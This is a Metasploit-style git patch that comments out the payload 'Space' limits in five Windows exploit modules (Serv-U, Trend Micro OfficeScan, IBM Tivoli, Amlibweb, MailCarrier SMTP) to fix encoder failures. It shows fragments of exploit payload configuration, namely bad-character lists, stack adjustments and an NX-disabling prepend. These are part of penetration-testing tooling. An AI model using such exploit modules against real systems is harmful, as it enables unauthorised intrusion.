From 1e2203867cfba83078037a33646b1610f32500de Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 16 Apr 2012 13:42:32 -0500 Subject: [PATCH] Repair 'no encoders encoded the buffer successfully' issues --- modules/exploits/windows/http/amlibweb_webquerydll_app.rb | 2 +- modules/exploits/windows/http/ibm_tpmfosd_overflow.rb | 2 +- modules/exploits/windows/http/servu_session_cookie.rb | 2 +- modules/exploits/windows/http/trendmicro_officescan.rb | 2 +- modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 4de0a22f2a..2d69004b7f 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Payload' => { - 'Space' => 600, + #'Space' => 600, 'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$", 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'DisableNops' => 'True', diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index ee68963445..a5491b3aeb 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 0x200, + #'Space' => 0x200, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a", 'Prepend' => # Disable NX on 2k3 to upload data on the stack diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index 23e4298c1d..2cfecda6b4 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 512, + #'Space' => 512, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a", 'StackAdjustment' => -4096, }, diff --git a/modules/exploits/windows/http/trendmicro_officescan.rb b/modules/exploits/windows/http/trendmicro_officescan.rb index bf859ae7b4..5edbed09d1 100644 --- a/modules/exploits/windows/http/trendmicro_officescan.rb +++ b/modules/exploits/windows/http/trendmicro_officescan.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'MinNops' => 0, 'MaxNops' => 0, - 'Space' => 498, + #'Space' => 498, 'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric), # clean up to prevent crash on exit 'Prepend' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov dword ptr fs:[0], 0").encode_string, diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 14404ba73b..5b6733ecb8 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Payload' => { - 'Space' => 300, + #'Space' => 300, 'BadChars' => "\x00\x0a\x0d:", 'StackAdjustment' => -3500, },